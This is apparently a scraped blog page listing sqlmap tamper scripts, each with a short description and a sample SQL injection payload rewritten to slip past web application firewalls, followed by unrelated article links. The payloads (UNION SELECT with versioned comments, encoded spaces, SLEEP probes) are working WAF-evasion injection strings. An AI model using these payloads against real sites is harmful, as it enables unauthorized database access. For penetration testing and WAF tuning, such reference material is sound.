SQLMap Tamper Scripts Update

apostrophemask.py

Replaces apostrophe character with its UTF-8 full width counterpart

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character with its illegal double unicode counterpart

'1 AND %271%27=%271'

appendnullbyte.py

Appends encoded NULL byte character at the end of payload

'1 AND 1=1'

base64encode.py

Base64 all characters in a given payload

'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'

'1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator

'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py

Double url-encodes all characters in a given payload (not processing already encoded)

'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

commalesslimit.py

Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'

''LIMIT 3 OFFSET 2''

commalessmid.py

Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

'MID(VERSION() FROM 1 FOR 1)'

concat2concatws.py

Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

charencode.py

Url-encodes all characters in a given payload (not processing already encoded)

'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)

'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

equaltolike.py

Replaces all occurances of operator equal ('=') with operator 'LIKE'

'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py

Slash escape quotes (' and ")

'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds versioned MySQL comment before each keyword

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

'IF(ISNULL(1),2,1)'

modsecurityversioned.py

Embraces complete query with versioned comment

'1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with zero-versioned comment

'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces around SQL keywords

'1 UNION SELECT foobar'

nonrecursivereplacement.py

Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters

'1 UNIOUNIONN SELESELECTCT 2--'

percentage.py

Adds a percentage sign ('%') infront of each character

'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M%T%A%B%L%E'

overlongutf8.py

Converts all characters in a given payload (not processing already encoded)

'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'

randomcase.py

Replaces each keyword character with random case value

'INseRt'

randomcomments.py

Add random comments to SQL keywords

'I/**/N/**/SERT'

securesphere.py

Appends special crafted string

"1 AND 1=1 and '0having'='0having'"

sp_password.py

Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

space2hash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

space2morehash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

space2mssqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Eid%0DFROM%07users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%A0id%0BFROM%0Cusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Did%0DFROM%0Ausers'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

"1 %26%26 '1'='1"

unionalltounion.py

Replaces UNION ALL SELECT with UNION SELECT

'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)

'1%bf%27 AND 1=1-- '

uppercase.py

Replaces each keyword character with upper case value

'INSERT'

varnish.py

Append a HTTP header 'X-originating-IP'

http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

versionedmorekeywords.py

Encloses each keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For'

' headers["X-Forwarded-For"]'

via

SQLMap Tamper Scripts Update 04/July/2016的更多相关文章

  1. Sqlmap Tamper大全(1)

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  2. 安全工具推荐之sqlmap tamper&sqlmap api

    我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...

  3. sqlmap tamper脚本

    本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...

  4. sqlmap Tamper脚本编写

    sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...

  5. Sqlmap Tamper大全

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  6. sqlmap tamper的使用

    前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...

  7. sqlmap tamper下模块的使用

    使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...

  8. sqlmap tamper编写

    #!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...

  9. sqlmap tamper绕过安全狗

    可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (ht ...

随机推荐

  1. 评《撸一段 SQL ? 还是撸一段代码? 》

    最近看到一篇博客<撸一段 SQL ? 还是撸一段代码?>,文章举例说明了一个连表查询使用程序code来写可读性可维护性更好,但是回帖意见不一致,我想作者在理论层面没有做出更好的论述,而我今 ...

  2. 在xcode中用 swift 进行网络服务请求

    xcode集成开发环境是运行于Mac苹果电脑上用于开发swift应用程序的工具,利用xcode可以很方便.直观的开发OS X和iOS系统所支持的应用程序. 1 开发环境: Mac OS 10.11 X ...

  3. JavaScript图表FusionCharts免费在线公开课,由印度原厂技术工程师主讲,10月13日发车

    FusionCharts公开课达人还你做 轻松晋升图表大师 [开课时间]10月13日 14:30[主讲老师]印度原厂技术工程师[开课形式]网络在线公开课[活动费用]前50名免费 现在就可以报名哦  报 ...

  4. 用Android Studio开发最常用到的快捷键

    Android Studio常用快捷键 Android Studio日常开发常用快捷键. 快捷键版本: Mac OS X 10.5+ 搜索查看类 用途 Mac快捷键 搜索所有文件 double Shi ...

  5. React Native 之 组件化开发

    前言 学习本系列内容需要具备一定 HTML 开发基础,没有基础的朋友可以先转至 HTML快速入门(一) 学习 本人接触 React Native 时间并不是特别长,所以对其中的内容和性质了解可能会有所 ...

  6. 【代码笔记】iOS-自定义弹出框

    代码: - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view. [s ...

  7. C# 知识特性 Attribute

    C#知识--获取特性 Attribute 特性提供功能强大的方法,用以将元数据或声明信息与代码(程序集.类型.方法.属性等)相关联.特性与程序实体关联后,可在运行时使用"反射"查询 ...

  8. SQL Server附加数据库报错:无法打开物理文件,操作系统错误5

    问题描述:      附加数据时,提示无法打开物理文件,操作系统错误5.如下图: 问题原因:可能是文件访问权限方面的问题. 解决方案:找到数据库的mdf和ldf文件,赋予权限即可.如下图: 找到mdf ...

  9. 安装TFS2015后启用生成功能

    安装了TFS2015后,发现高大上呀.可是在传了个DEMO,BUILD生成的时候提示没有 一些文件,提示:找不到具有以下功能的代理: msbuild, visualstudio.在服务端安了VS201 ...

  10. 【C++】类和对象(构造与析构)

    类 类是一种抽象和封装机制,描述一组具有相同属性和行为的对象,是代码复用的基本单位. 类成员的访问权限 面向对象关键特性之一就是隐藏数据,采用机制就是设置类成员的访问控制权限.类成员有3种访问权限: ...